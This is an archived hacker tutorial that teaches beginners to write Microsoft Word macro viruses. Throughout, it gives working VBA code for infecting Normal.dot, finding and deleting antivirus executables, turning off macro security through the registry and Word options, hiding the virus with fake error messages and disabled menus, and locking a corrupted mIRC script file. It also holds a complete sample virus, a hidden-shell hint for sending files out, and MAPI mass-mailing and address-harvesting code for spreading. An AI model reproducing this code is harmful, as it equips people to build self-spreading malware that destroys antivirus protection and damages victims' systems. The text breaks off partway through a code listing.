Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Malware :: xdemacro.txt

xde's neophyte guide to macro programming




     xde's neophyte guide to Macro programming

     Index:>

     A)Disclaimer
     B)Introduction
     C)What is a Macro Virus?/How It Works
     D)Macro and statistics
     E)Terms to know
     F)Catching and Debugging one

     X)Getting down to the code
     1.)Implementing Stealth Techniques
     2.)Registry Codes for use in Macro's
     D)Your first Mini-Macro virus
     E)Sending Email using MAPI

     Q)Conclusion & Notes

     -------------------------------------
     8********************************8
     8*********(Disclaimer)***********8
     8********************************8

     This is an educational document, i take no responsibility for what use the
     information in this document is used for. I am unable to be blamed for any
     troubles you get into with the police, FBI, or any other department. Viruses
     are illegal to be spread, so this is simply for theoretical purposes or 
     testing
     in a controlled envirnment. It is not illegal to write viruses, but it is 
     illegal
     to spread them- something i do not condone and take responsibility for.

     -------------------------------------
     8********************************8
     8*********(Introduction)*********8
     8********************************8

     In this article/tutorial or whatever you want to call it- my aim is to 
     educate
     those who want to be educated in the area of Macro viruses. It is for the 
     neophyte
     but i do hope the already educated can learn something from it. I do this in 
     hope
     that i will succeed. As said in the disclaimer, i take no responsibility for
     what happens to you if this article does educate you (yay!) and you use it 
     for
     illegal purposes. This article is an assimilation of everything i have read 
     and learned
     within the time i have been researching macro viruses. Now lets continue!

     -------------------------------------
     8**************************************8
     8*******(What is a Macro Virus?)*******8
     8**************************************8

     A Macro virus is created using a Macro programming language, usually 
     Microsoft Word
     2000, or Word97. Word 97 is better to create Macro viruses in because of the 
     way
     it is setup to catch macros. But we will go into that in section G). Macro 
     viruses
     take advantage of Microsofts Visual Basic for Applications. The Macro virus
     (which from here on out will be referred to as MV cuz i don't want to write 
     it
     a whole bunch of times) then attaches itself to the document or template. 
     (It is
     usually attached to Normal.dot, but we will also go over that in section G))
     It works in this function: The document is opened, the MV is set to infect 
     on Open,
     It infects it, saves the infection to the default template, then when 
     another document
     is opened it automatically infects that document as well.**Addition: The 
     template
     file that is infected is the Normal.dot -> which is the global template for 
     word. It
     does this using the FileSaveAs or Document_Open command, that way it infects 
     all
     documents**

     -------------------------------------
     8****************************************8
     8********(Macro and Statistics)**********8
     8****************************************8

     The first MV (to my knowledge) was WM.Concept , WM standing for Word Macro,
     (you will need to know this if you want to find sources of WMV (Word Macro 
     Viruses)
     This viruses first started in 1994, and at the end of 1955 Macro viruses for 
     Word
     and Accel were becoming more and more popular.
     Below is a small informer of how the popularity of Macro viruses took over 
     the net
     and fell back down, etc.
     1995 - Less than 10%
     1996 - About 25%
     1997 - About 55%
     1998 - About 62%
     1999 - 80%
     2000 - About 51% (An odd drop, MV's getting less common?)
     2001 - About 30%

     Well, from the small informer above you can tell that MV's had their peak at 
     bout
     1999 and are decreasing.. rapidly rather. So i figure either people are 
     getting more
     interested in ASM viruses, Macro viruses are simply being produced less due 
     to lack
     of knowledge, or they are simply getting easier to defend against.


     -------------------------------------
     8*********************************8
     8********(Terms to know)**********8
     8*********************************8

     Ok, before we continue any further in this tutorial, you have to know a few 
     terms
     in the virii industry. Below are terms that should better educate you in the 
     area
     of viruses and the types.

     vx = Virus eXchange (people who trade viruses)

     VCK = Virus Construction Kit (yes they do exist)

     AV = AntiVirus (the software to catch the viruses)

     Worm = Is a computer program that spreads working copies of itself to other 
     computer
     systems (usually through Outlook)

     Boot Sector Viruses = This kind of virus infects the hard disk or floppy. 
     When the
     computer boots, the virus is ran along with the rest of the programs on your 
     computer
     -the virus can then load itself into memory in which it replicates infecting 
     the
     boot sectors of the floppy, etc.

     Trojan = Allows you to remotely connect to a computer and control it without 
     the
     administrator of the computer to notice. Also known as RAT.

     File Infector = Attaches itself to files and infects. (Usually attaches to 
     EXE's,
     batch's, sys's, COM's, etc.)

     Dropper = a program that has been modified or specifically created to 
     drop(place) a
     virus onto the user computer system.

     Stealth Virus = (kind of obvious) even though it is running, it is 'hidden' 
     to the
     unsuspecting user.

     Polymorphic = One that creates altered forms of itself which make it more 
     difficult
     to crack down on the virus (with AV at least)

     Fast Infection = Fast is when it infects all opened documents.

     Payload = The specific time set for when the main procedure of the virus 
     goes off.
     This is usually the most damaging part of the virus.

     Tunneling Virus = one that finds the interrupters and calls them.

     ANSI Bomb = When the user hits a specific character, or series of 
     characters- whatever
     payload you have set will activiate. (Eg. You hit space, and they lose all 
     .exe's)

     Resident Infection = Places itself somewhere in the Random Access Memory 
     (RAM)

     BSI = Boot Sector Infection
     DBS = DOS Boot Sector
     MBR = Master Boot Record
     RAM = Random Access Memory
     TSR = Terminate but Stay Resident

     Now hopefully all of the above has helped you in your quest for knowledge!

     -------------------------------------
     8**********************************************8
     8*********(Catching and Debugging one)*********8
     8**********************************************8

     Alright, well there are always ways to catch a virus. So in this section 
     (which will
     be rather small) i will explain how to catch and know if you are infected by 
     a MV.
     As a first note- the best version of word to use for MV programming is 
     Word97. The
     reason will be pointed out as i explain how to catch and debug(view source, 
     etc) of
     the MV. Ok, we will start with knowing you are infected. There are the 
     obvious ways
     of MV error messages- or if it is a "stealth" MV- then you can search for 
     Normal.dot
     If Normal.dot is around 40kb in size, than you know it has been modified- 
     and chances
     are you have been infected by a MV. Usually if you open up your exe in a hex 
     editor
     and search around you can see some of the source. I have not tried to edit 
     it within
     the hex editor, but i am sure it is possible. Ok, now to catch and view a 
     MV. Say
     you get a MV- and you want to see it's source. In Word97, if you open the 
     document
     and try to go into the VBA Editor it will popup a screen (or it may do it on 
     default)
     and it will say something like- warning, Macro's are in this document- 
     Disable?
     Click yes. Now you can go and view the source of the macro without being 
     infected.
     Word97 is a better editor because of this- It has the Disable macro screen, 
     where
     Word2000 simply tells you that you have macro's and gives no means (to my 
     knowledge
     at least) of deactivation. Now on to the next section!

     -------------------------------------
     8****************************************8
     8*******(Getting down to the code)*******8
     8****************************************8

     Ok, so we have a generally good background, now lets down to learning the 
     actual
     code! In MV programming there are the basic functions. They are as follows:

     Document_Open() - These commands infect on the opening of the document.

     Document_New() - Infects on any new document

     Document_Close() - Infects when any document is closed

     FileSaveAs() - Infects when the action Save As is run

     FileSave() - Infects when user saves

     ToolsSpelling() - Infects on spell check

     ToolsGrammar() - Infects on grammar check

     AutoExec() - When the document is opened (specially used for the template)

     AutoExit - When the document is closed (Sepcially used for the template)

     ViewVBCode() - Basically what the title says- this is mainly good for 
     stealth

     ToolsMacro() - same idea as ViewVBCode, good for stealth

     FileTemplates() - Also the same, good for stealth.

     Shell "command.com /whatever you want", vbHide
     ^^The above is to execute things in DOS, the vbHide hides the DOS window 
     so the
     user is unaware anything is going on.
     You may be wondering how this could be helpful, well say you want to get a 
     file then
     send it to yourself... well you can go
     Shell "command.com /c ftp.exe", vbHide
     And it would run the FTP program, i will let you go and figure out how to do 
     the
     rest =]

     Above are the list of most commonly used functions in MV's for infection. 
     When coding
     them, each thing should have a Sub in front of it and end with End Sub.
     Lets do an example:

     Sub Document_New()
     msgbox "x11011110x"
     End Sub

     Put that into your VBA and run the macro, then create a new document and 
     watch the
     message box popup!

     Ok, so that was a kiddy thing- but we need to start somewhere. A nice place 
     to look
     for new code or if you need help is the help file itself. Anyways, lets try 
     to do
     something a bit more skilled, lets open a file and then write to it. But 
     wait!
     Before we do, i forgot to tell you to always have "On Error Resume 
     Next"(without the
     quotes) at the beginning of every sub you do. Now lets do another example:


     Sub Document_Open()
     On Error Resume Next 'Always have this at the beginning of a sub
     Open "C:\xde.txt" For Output As #1 'this opens/creates a file called xde.txt 
     in C:
     Print #1, "x11011110x" 'this print x11011110x to the file
     Close #1 'this closes the file we opened, you want this
     Msgbox "File Written to" 'pops this message up

     Yay! We just made a more advanced program and it can help you with your MV's 
     too!
     Ok, so far we know all of the most commonly used macro functions/subs, we 
     know to
     always use On Error Resume Next -we know how to open/create and then 
     write to
     a file. What more do i need to know now?! Well, a lot =] Which is why we 
     should move
     to the next section!

     -------------------------------------
     8***********************************************8
     8*******(Implementing Stealth Techniques)*******8
     8***********************************************8

     Ok, to start this section off- there are many ways you can use stealth 
     techniques,
     but i am just covering the ones that i know of and have learned from 
     countless
     documents and MV's i've viewed. There are 4 types of ST's (Stealth 
     Techniques)
     At least- to my belief there are:
     1)AV Deletion
     2)Error Messages
     3)Toolbar/etc. Disabling
     4)Registry

     We will go over each in the order provided above. Since AV deletion is 
     first, let us
     start there! Now, we all know the most popular AV's (McAfee, Norton, etc.) 
     so let's
     go and make a small piece of code that will go- find the .exe, then delete 
     it.
     Then pow! No more AV! What i found lacking in a lot of viruses/documents on 
     MV's was
     the fact that a lot of people always assumed it was in the default 
     directory. Which
     is why i provide a search function. Now, it took me some time to figure out 
     how to
     get the file path after the search was done- I was looking in the windows 
     help for
     WordVBA but was still having difficulty, if it weren't for a friend at BSRF 
     who helped
     me figure it out- then, well, we wouldn't have the benefit =].


     Sub Mainz()
     Set Fs = Application.FileSearch 'Sets FS to the Filesearch application
     es$ = "xdez.txt" 'defines es$ to xdez.txt
     With Fs 'command so you don't have to type Fs. bla bla
     .LookIn = "C:\" 'specifies the drive/or folder
     .SearchSubFolders = True 'tells it to search everything in the 
     drive/folder
     .FileName = es$ 'this is the filename it looks for, es$
     If .Execute > 0 Then 'if its found, execute below
     MsgBox "File Found" 'Tell us its found
     Set ds = CreateObject("Scripting.FileSystemObject") 'This creates FSO 
     object
     Set fy = ds.GetFile(es$) 'this allows us to get the filepath
     h = (fy.Path) 'this assigns the file path to a variable
     SetAttr h, vbNormal 'sets the attribute of the file to normal
     Kill (h) 'deletes the file
     MsgBox "File Illimenated" 'informs us of deletion
     Else
     MsgBox "File was not found." 'tells us the file wasn't found
     End If 'Ends our If .Execute statement
     End With 'ends our With Fs statement

     End Sub 'Ends program

     Ok, i can understand the above might be a bit confusing, and the MsgBox's 
     are for
     debugging purposes. Let's go over some of the parts of code that might be a 
     bit more
     complicated.
     Firslty, you may be wondering why i put something like fy for the variable 
     name. I did
     this so the virus would be more difficult to be located by an AV. 
     Continuing:

     Set ds = CreateObject("Scripting.FileSystemObject")
     This line is what allows us to get the file path, it creats the script 
     object for
     use in the macro. We can see it used when we do: Set fy = ds.GetFile(es$)
     Ok. That line of code works like this: File Operator.GetFile(filespec)
     In this case, the file operator is defined in ds, so its: 
     ds.GetFile(filespec) since
     our file spec is defined in es$ we have the total line of: ds.GetFile(es$)

     The next line(s) that may have confused you is the h = (fy.Path) <==This 
     simply
     sets h to the file path. (Eg. C:\My Documents\xdez.txt)
     So when we do, SetAttr h, vbNormal.
     It is technically doing: SetAttr "C:\My Documents\xdez.txt", vbNormal
     Which sets the attribute of that file to normal (and for our benifit, makes 
     it
     delete able. Which explains the next line: Kill (h) which can be looked at 
     as,
     Kill ("C:\My Documents\xdez.txt")
     In other words, Delete the file that was found at that path. Now here is the 
     full code
     without the debug things (so people don't know whats actually going on.

     Sub Mainz()
     On Error Resume Next 'always have this!
     Set Fs = Application.FileSearch
     es$ = "xdez.txt"
     With Fs
     .LookIn = "C:\"
     .SearchSubFolders = True
     .FileName = es$
     If .Execute > 0 Then
     Set ds = CreateObject("Scripting.FileSystemObject")
     Set fy = ds.GetFile(es$)
     h = (fy.Path)
     SetAttr h, vbNormal
     Kill (h)
     Else

     End If
     End With
     End Sub

     Wait! There was something new! Ok, this isn't hard to understand, the
     On Error Resume Next simply says to ignore all errors in the program and 
     keep going.
     We want this and always use this in the programming of MV's!
     You may be thinking, ok, great, so i know how to find a file then delete it, 
     but how
     do i use that. Well, get some AV software- install it- figure out what you 
     want to
     delete- then specify that in the place of es$. So instead of es$ = 
     "xdez.txt" it would
     be es$ = "Norton.exe" or whatever. Ok, so thats the basic way to delete 
     the AV-
     although what if they reinstall it? Then you can simply make the script open 
     the
     autoexec.bat and have the .bat check to see if it is installed, and if it is 
     delete it.
     Since we covered opening and writing to a file earlier- you should be able 
     to do what
     was said above.

     2)Error Messages
     Well, one way to prevent detection is to popup error messages or things of 
     the sort
     when users try to access your macro, or close the document, or whatever. 
     Make the error
     seem common, otherwise the user will notice it.

     Ok, so lets say when the person tries to go and view your code... hah! They 
     can't
     because of our nice little protection/stealth error. It would work something 
     like:

     Sub ViewCode()

     MsgBox "Not enough memory", 16

     End Sub

     ^Taken from LineZer0^

     Ok, so we had the message box, all we did was add the type of popup. It just 
     happens
     that 16 is the popup for critical. Here are the value's of the popups And 
     here is
     one more example:

     MsgBox "This program has performed an illegal operation and will be shut 
     down.", vbCritical, "Microsoft Word"

     Criticals:
     16 - Critical
     18 - Abort/Ignore/Retry
     19 - Yes/No/Cancel
     20 - Yes/No
     21 - Retry/Cancel

     Standard
     1 - Ok/Cancel
     2 - Abort/Ignore/Retry
     3 - Yes/No/Cancel
     4 - Yes/No
     5 - Retry/Cancel

     All these can also be placed using the test phrases as well.
     Eg. For informational error it would be: MsgBox "Not Enough Memory", 
     vbInformation
     For an exclamation point, it would be: MsgBox "Not Enough Memory", 
     vbExclamation

     That sums up the Error message area, wasn't to difficult eh? Great! Now we 
     go to the
     next section.

     3)Disabling Toolbars, etc..
     In Word, there are lots of toolbars, such that allow you to see the status 
     of the
     program, macro, etc. So what we do is disable them =]
     Ok, firstly, we want to disable the use of changing the security of the 
     macro once
     ours infects. We can do this with the following line:

     CommandBars("Macro").Controls("Security...").Enabled = 0

     **The next line disables the macro button:

     CommandBars("Macro").Controls("Macros...").Enabled = 0

     As for the rest of these im going to put below most of them are pretty 
     straight forward.
     As for 0, you can also just put False, or instead of enable, you can put 
     .Delete but
     that is a bit more noticeable. (If the user is now lacking a lot of buttons 
     =] )

     CommandBars("Tools").Controls("Customize...").Enabled = False
     CommandBars("View").Controls("Toolbars").Enabled = False
     CommandBars("View").Controls("Status Bar").Enabled = False
     CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
     CommandBars("Format").Controls("Style...").Enabled = False

     Above we had it removing the statusbar, we did this because the program 
     tracks certain
     operations in the status bar- so with it removed we are less likely to be 
     noticed.

     On another note, in your virus when you need to save something or you don't 
     want the
     user to be prompted to have his document saved eventhough he made edits- you 
     can use
     the following code- These commands tell Word that the document has already 
     been saved,
     so it won't prompt you.

     NormalTemplate.Saved = True
     ActiveDocument.Saved = True

     Below only works in Word97 (As far as i can understand). What it does is 
     disables the
     prompt of - would you like to activate macro's? -. So your macro will 
     automatically
     run without the prompt.

     Options.VirusProtection = False

     Another useful one is disabling the cancel key, im sure you can imagine how 
     this is
     helpful.

     Application.EnableCancelKey = wdCancelDisabled
     Application.ScreenUpdating = False 'this one is rather straightforward.

     4)Registry security disabling.
     Well, i don't know a lot of these, so here is the one i do know.

     System.PrivateProfileString("", 
     "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 
     1&

     Basically what this does it set the macro security of Word to the lowest so 
     our macro's
     will execute.

     ************(Getting down to the code>>Section Two.)************8
     Registry Codes for use in Macro's*******************************8
     ****************************************************************8
     All the registry codes below were taken from LineZer0 Zine.


     Hides all drives in My Computer:

     HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
     Nodrives = 3

     Disables Adding Printers:

     HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
     NoAddPrinter = 1

     Sub folders at start-programs will be disabled.

     HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
     NoStartMenuSubFolders = 1

     All items on desktop will be hidden:

     HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
     NoDesktop = 1

     Message box will appear on start

     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
     LegalNoticeCaption = Text
     LegalNoticeText = Text

     **A few additions by mio:

     Gets rid of the shutdown button:

     HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
     "NoCloseKey" = "1"

     You can set the Source Directory of windows:

     HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
     "WinDir"="C:\Windows\"

     I haven't tried this one yet- but i think it will make the connect screen 
     appear

     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
     "LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
     "TrueVector"="C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE -service"
     "MiniLog"="C:\\WINDOWS\SYSTEM\ZONELABS\MINILOG.EXE -service"

     This disables the Recent Documents folder in the start menu. (In case you 
     have some
     program you wanted to run but it would be caught cuz of it)

     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
     "NoRecentDocsMenu"="1"

     Gets rid of the task bar:

     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
     "NoTaskbar"=dword:00000000

     Gets rid of network neighborhood:

     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
     "NoNetHood"=dword:00000000

     Removes Recent Document system folder from the Start Menu:

     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
     "NoRecentDocsHistory"=dword:0

     Removes Control Panel from being displayed

     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
     "NODispCPL"=dword:00000000


     Ok, well that's all of them. Yay!

     -------------------------------------
     8**********************************************8
     8*********(Your first mini-Macro Virus)********8
     8**********************************************8

     In this section, we will go over all the basics of what we have learned so 
     far. The
     mini-macro virus we are going to make is going to be a MV ro mIRC virus. It 
     won't
     be anything really fancy and exciting- just enough to go over all the basics 
     of what
     we have talked about so far. Now let's start!
     Ok, so here is the file proccess.
     The person runs word.
     -When the document is closed, the infection takes place.
     -checks to see if script.ini for mIRC exists.
     -if it does, it adds our little script part to it else ends
     -now that the script is added, the program is complete
     -end program ->

     Sub Document_Close()
     On Error Resume Next
     'Security part of the MV
     System.PrivateProfileString("", 
     "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 
     1&
     CommandBars("Macro").Controls("Security...").Enabled = 0
     CommandBars("Macro").Controls("Macros...").Enabled = 0
     CommandBars("Tools").Controls("Customize...").Enabled = 0
     CommandBars("View").Controls("Toolbars").Enabled = 0
     CommandBars("View").Controls("Status Bar").Enabled = 0
     CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
     CommandBars("Format").Controls("Style...").Enabled = 0
     Application.ScreenUpdating = False
     Application.DisplayStatusBar = False
     Application.DisplayAlerts = False
     Options.VirusProtection = False

     'I learned the below from Lord Arz which is why the code is quite familiar
     'although a lot of Virus writers like to import there virus which they 
     export in the
     'beginning
     Miniv = ActiveDocument.FullName 'sets Miniv as the current document
     Hit = NormalTemplate.Name 'Hit is the Normal.dot (what we want to infect)
     If ThisDocument.Name = "Normal.dot" OR "Normal.Dot" Then 'If either name 
     matches
     Miniv = Hit 'Then they = eachother

     Application.OrganizerCopy Miniv, Hit, "Mini-Virus", 
     wdOrginizerObjectProjectItems

     '^This is the function for copying local VBA's while word is running.
     'Miniv is our source, Hit is where its copying to, "Mini-Virus" is the name,
     'wdOrginizerObjectProjectItems is the object to copy the items in our 
     project.

     'Here is the part where it checks if the file exists

     infe$ = "c:\mirc\script.ini" 'sets the path for easier re-use

     Set fs = CreateObject("Scripting.FileSystemObject") 'creates the FSO object
     If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
     '^ If the file exists, goto mircwrite, if it doesn't, go to fling

     mircwrite:
     Open "c:\mirc\script.ini" For Output As #1 'opens the file
     Print #1, "[Script]" 'writes
     Print #1, "n0;Miniscript" 'writes
     Print #1, "n1= ON 1:JOIN:#:{ /exit } " 'writes
     Print #1, "n2= ON 1:*xde*:#:{ /exit };" 'writes
     Close #1 'closes the file (we always want this)
     SetAttr "c:\mirc\script.ini", vbReadOnly
     '^sets it so no one else can write to it.
     GoTo finish 'goes to finish

     fling:
     MsgBox "Invalid Memory Space", vbCritical 'Warning message

     finish:
     End Sub

     Sub Document_Open()
     CommandBars("Macro").Controls("Security...").Enabled = 0
     CommandBars("Macro").Controls("Macros...").Enabled = 0
     CommandBars("Tools").Controls("Customize...").Enabled = 0
     CommandBars("View").Controls("Toolbars").Enabled = 0
     CommandBars("View").Controls("Status Bar").Enabled = 0
     CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
     CommandBars("Format").Controls("Style...").Enabled = 0
     Application.ScreenUpdating = False
     Application.DisplayStatusBar = False
     Application.DisplayAlerts = False
     Options.VirusProtection = False

     'just kinds of redoes everything making sure our virus isn't located
     End Sub

     Sub ViewVBCode()
     MsgBox "Invalid Memory Space", vbCritical 'Warning message
     End Sub


     Sub ToolsMacro()
     MsgBox "Invalid Memory Space", vbCritical 'Warning message
     End Sub


     Sub FileTemplates()
     MsgBox "Invalid Memory Space", vbCritical 'Warning message
     End Sub


     Ok, thats our mini virus! But before i let you go off and start your own 
     things, you
     may want to take a quick look below.
     Most virus writers use a different method of infection. This method looks 
     something
     along the lines of:

     If ThisDocument.Name = "normal.dot" Or "Normal.Dot" Then
     For i=1 to ActiveDocument.VBProject.VBComponents.Count
     If ActiveDocument.VBProject.VBComponents(i).Name="Virus name" Then 
     Goto Destination
     Next i

     This is a For...next loop. What we are doing is taking i, setting it to the 
     value of 1
     then having it add 1 to I until it reaches the number that .Count is at (the 
     number
     of active documents, im assuming).
     Then, inside the loop it is using an If...Else statement (if this happens do 
     this,
     otherwise do this) which says- If one of the projects has the title of 
     "Virus name"
     (Virus name being the name of your virus) then GOTO the mark. Whats this 
     GOTO stuff!?
     You never talked about it! GOTO is simply, GOTO is simply a 'mark' if you 
     will- in the
     program. To imply text as a 'mark' in the program, simply put the text then 
     a :
     For example:
     Sub AutoExit()
     Msgbox "x11011110x"
     Goto ending
     'whatever code would be here
     ending:
     End Sub

     ending: is your mark, GOTO says go to ending:

     For i=1 to NormalTemplate.VBProject.VBComponents.Count
     If NormalTemplate.VBProject.VBComponents(i).Name="Virus name" Then 
     Goto Destination
     Next i

     This is basically the same as the above, except it is referring to the 
     templates now-
     insuring that you infect the right template (is my guess). As i said before, 
     Virus
     writers use this a lot- so it is good to understand it.


     -------------------------------------
     8**********************************************8
     8**********(Sending Email Using MAPI)**********8
     8**********************************************8

     I didn't write this part, i found it on a site and thought it would be 
     helpful
     so i thought i would add it to this document since Sending viruses via email 
     is
     important. I take no credit for this guys work, and i did not alter his 
     document which
     is below what so ever:

     Macroviruses and Internet
     This article is designated for those coderz thinking of writing macroviruses 
     taking advantage of new internet technologies.

     I will discuss how to:

     send e-mail using MAPI win32api
     download plugin using undocumented function winapi DoFileDownload
     search for e-mail adresses in files
     Sending e-mail using MAPI win32api
     This is siplme example of sending e-mail using MAPI API. We will use 
     MAPILogOn, MAPISendMail, MAPILogoff functions to solve our task. This code 
     (procedure) send e-mail with text message of your choice.

     Public Const MAPI_AB_NOMODIFY = &H400
     Public Const MAPI_BCC = 3
     Public Const MAPI_BODY_AS_FILE = &H200
     Public Const MAPI_CC = 2
     Public Const MAPI_DIALOG = &H8
     Public Const MAPI_E_AMBIGUOUS_RECIPIENT = 21
     Public Const MAPI_E_AMBIG_RECIP = MAPI_E_AMBIGUOUS_RECIPIENT
     Public Const MAPI_E_ATTACHMENT_NOT_FOUND = 11
     Public Const MAPI_E_ATTACHMENT_OPEN_FAILURE = 12
     Public Const MAPI_E_ATTACHMENT_WRITE_FAILURE = 13
     Public Const MAPI_E_BAD_RECIPTYPE = 15
     Public Const MAPI_E_BLK_TOO_SMALL = 6
     Public Const MAPI_E_DISK_FULL = 4
     Public Const MAPI_E_FAILURE = 2
     Public Const MAPI_E_INSUFFICIENT_MEMORY = 5
     Public Const MAPI_E_INVALID_EDITFIELDS = 24
     Public Const MAPI_E_INVALID_MESSAGE = 17
     Public Const MAPI_E_INVALID_RECIPS = 25
     Public Const MAPI_E_INVALID_SESSION = 19
     Public Const MAPI_E_LOGIN_FAILURE = 3
     Public Const MAPI_E_LOGON_FAILURE = MAPI_E_LOGIN_FAILURE
     Public Const MAPI_E_MESSAGE_IN_USE = 22
     Public Const MAPI_E_NETWORK_FAILURE = 23
     Public Const MAPI_E_NO_MESSAGES = 16
     Public Const MAPI_E_NOT_SUPPORTED = 26
     Public Const MAPI_E_TEXT_TOO_LARGE = 18
     Public Const MAPI_E_TOO_MANY_FILES = 9
     Public Const MAPI_E_TOO_MANY_RECIPIENTS = 10
     Public Const MAPI_E_TOO_MANY_SESSIONS = 8
     Public Const MAPI_E_TYPE_NOT_SUPPORTED = 20
     Public Const MAPI_E_UNKNOWN_RECIPIENT = 14
     Public Const MAPI_ENVELOPE_ONLY = &H40
     Public Const MAPI_FORCE_DOWNLOAD = &H1000
     Public Const MAPI_GUARANTEE_FIFO = &H100
     Public Const MAPI_LOGOFF_SHARED = &H1
     Public Const MAPI_LOGOFF_UI = &H2
     Public Const MAPI_LOGON_UI = &H1
     Public Const MAPI_NEW_SESSION = &H2
     Public Const MAPI_OLE = &H1
     Public Const MAPI_OLE_STATIC = &H2
     Public Const MAPI_ORIG = 0
     Public Const MAPI_PEEK = &H80
     Public Const MAPI_RECEIPT_REQUESTED = &H2
     Public Const MAPI_SENT = &H4
     Public Const MAPI_SUPPRESS_ATTACH = &H800
     Public Const MAPI_TO = 1
     Public Const MAPI_UNREAD = &H1
     Public Const MAPI_UNREAD_ONLY = &H20
     Public Const MAPI_USER_ABORT = 1
     Public Const MAPI_E_USER_ABORT = MAPI_USER_ABORT
     Public Const SUCCESS_SUCCESS = 0
     '-- mapi message recipient object type

     Public Type MapiRecip
     Reserved As Long
     RecipClass As Long
     Name As String
     Address As String
     EIDSize As Long
     EntryID As String
     End Type
     '-- mapi message file object type

     Public Type MapiFile
     Reserved As Long
     Flags As Long
     Position As Long
     PathName As String
     FileName As String
     FileType As String
     End Type
     '-- mapi message object type

     Public Type MAPIMessage
     Reserved As Long
     Subject As String
     NoteText As String
     MessageType As String
     DateReceived As String
     ConversationID As String
     Flags As Long
     RecipCount As Long
     FileCount As Long
     End Type

     Public Declare Function MAPILogoff Lib "MAPI32.DLL" (ByVal Session&, _
     ByVal UIParam&, ByVal Flags&, _
     ByVal Reserved&) As Long

     Public Declare Function MAPILogon Lib "MAPI32.DLL" (ByVal UIParam&,_
     ByVal User$, ByVal Password$, _
     ByVal Flags&, ByVal Reserved&,_
     Session&) As Long

     Public Declare Function MAPISendMail Lib "MAPI32.DLL" Alias _
     "BMAPISendMail" (ByVal Session&,
     ByVal _
     UIParam&, Message As MAPIMessage, _
     Recipient() As MapiRecip, File() As
     MapiFile, _
     ByVal Flags&, ByVal Reserved&) As
     Long


     ' Mailsending procedure
     ' sTo - target adress (where the email should ne delivered)
     ' sSubject - email subject
     ' sMessage - message body text

     Public Function api_SendMail(sTo As String, sSubject As String, sMessage As
     String)

     ' * use api functions to send mail
     '
     On Error Goto suxx
     Dim Rtn As Long '-- return value For api calls
     Dim objMsg As MAPIMessage''-- message object
     Dim objRec() As MapiRecip''-- recipient object array
     Dim objFile() As MapiFile''-- file object array
     Dim hMAPI As Long'-- session handle
     ReDim objRec(1)
     ReDim objFile(1)
     '
     '-=-=-=-=-=-
     'file object
     '-=-=-=-=-=-
     '
     ' * default - not expecting to send a file
     '
     objFile.Reserved = 0
     '
     ' * values not used
     '
     'objFile.Flags
     'objFile.Position = -1
     'objFile.PathName = "c:\mtx4ever.exe"
     'objFile.FileName = 0
     'objFile.FileType = 0
     '
     '-=-=-=-=-=-=-=-=
     'recipient object
     '-=-=-=-=-=-=-=-=
     '
     objRec(0).Reserved = 0
     objRec(0).RecipClass = 1
     objRec(0).Name = sTo
     '
     ' * values not used for recipient
     '
     'objRec.Address
     'objRec.EIDSize
     'objRec.EntryID
     '
     '-=-=-=-=-=-=-=
     'message object
     '-=-=-=-=-=-=-=
     '
     objMsg.Reserved = 0
     objMsg.Subject = sSubject ' mail subject
     objMsg.RecipCount = 1
     objMsg.FileCount = 0 ' how many files are in message
     objMsg.NoteText = sMessage ' mail message
     '
     ' * values not used for message
     '
     'objMsg.MessageType
     'objMsg.DateReceived
     'objMsg.ConversationID
     'objMsg.Flags

     ' We will create a session for e-mail sending

     ' using standart windows password for sending emails.
     ' it's possible not to use MS Exchange Settings, and simply put 0 to that
     option
     Rtn = MAPILogon(0, "MS Exchange Settings", "", MAPI_LOGON_UI, 0, hMAPI)

     ' * send mail message through MAPI

     Rtn = MAPISendMail(hMAPI, 0, objMsg, objRec, objFile, 0, MAPI_DIALOG)

     ' * logoff MAPI application

     Rtn = MAPILogoff(hMAPI, 0, 0, 0)

     ' * close this function
     Exit Function

     suxx:
     Msgbox "MOD_MAIL.api_SendMail()"
     End Function

     Search of mail adresses in files
     Information
     The procedure itself was written by fanous russian virus wroter 
     Cybershadow/SMF (and you got to my articles), I changed the code a bit and 
     added recurssive disk search using API functions.

     Procedure description
     Procedure Search

     SearchPath = name of the directory (exemple SearchPath = "C:\My Documents"
     FindStr = file names in which we will search (exemple FindStr = "*.*htm")

     After we entered search parameters we will the procedure will search for 
     email adresses. If email adress has been found it will be stored in name_ 
     paramater. You just need to add code for sending and the rest. Lot of mail 
     adresses can be found in "C:\windows\Temporary Internet Files". On my 
     computer i have found there about 300 mail adresses.

     ---- BAS MODULE -----------

     Private Declare Function FindFirstFile Lib "kernel32" _
     Alias "FindFirstFileA" _
     (ByVal lpFileName As String, _
     lpFindFileData As WIN32_FIND_DATA) As Long

     Private Declare Function FindNextFile Lib "kernel32" _
     Alias "FindNextFileA" _
     (ByVal hFindFile As Long, _
     lpFindFileData As WIN32_FIND_DATA) As Long

     Private Declare Function GetFileAttributes Lib "kernel32" _
     Alias "GetFileAttributesA" _
     (ByVal lpFileName As String) As Long

